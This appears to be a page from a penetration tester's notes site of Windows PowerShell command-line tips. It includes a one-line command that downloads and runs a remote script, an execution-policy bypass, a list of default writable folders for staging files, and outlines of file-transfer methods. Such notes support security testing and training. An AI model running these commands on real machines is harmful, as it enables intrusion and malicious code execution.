search

CLI Tips

hashtag
Powershell

hashtag
Load Powershell Module Over HTTP

Load Powershell Module Over HTTP:

IEX (New-Object Net.WebClient).DownloadString('http://example.com/some_module.ps1');'

hashtag
Bypass Powershell Execution Policy

If you don't bypass the execution policy, you won't be able to run external powershell scripts. Run Powershell with Execution Policy Bypass:

powershell.exe -ExecutionPolicy Bypass

hashtag
Switch to 64-bit Powershell from 32-bit

If you're on a 64-bit machine and running a 32-bit Powershell, then some things might not work, such as autologon discoveryarrow-up-right.

  • Check in powershell:

    • [environment]::Is64BitOperatingSystem

    • [environment]::Is64BitProcess

  • Access 64-bit Powershell at:

    • C:\Windows\SysNative\WindowsPowerShell\v1.0\Powershell.exe

    • This path should exist for 32-bit applications even if you can't see it because it is virtual.arrow-up-right

    • Just running that executable from an existing 32-bit executable might not work. I got it to work when I rewrote the original payload to use this path instead of just powershell.exe with no path.

hashtag
View Hidden Files

hashtag
Running Powershell commands from CMD

You can do it like this, but you need to press enter to get the output.

hashtag
Writable Folders

Default Writeable Foldersarrow-up-right:

  • C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys

  • C:\Windows\System32\spool\drivers\color

  • C:\Windows\Tasks

  • C:\Windows\tracing

  • C:\Windows\Temp

  • C:\Users\Public

hashtag
Transferring Files

LogoTransferring files | Rowbot's PenTest Notesguide.offsecnewbie.comchevron-right

hashtag
HTTP Download

Start an HTTP server on your Linux machine:

Download file over HTTP using curl (in case it's installed in Powershell):

Download file using certutil:

hashtag
FTP Upload

Start an FTP server on your linux machine:

If you don't specify username and password, then you can log in with user anonymous and no password.

PreviousWindowsNextShells

Last updated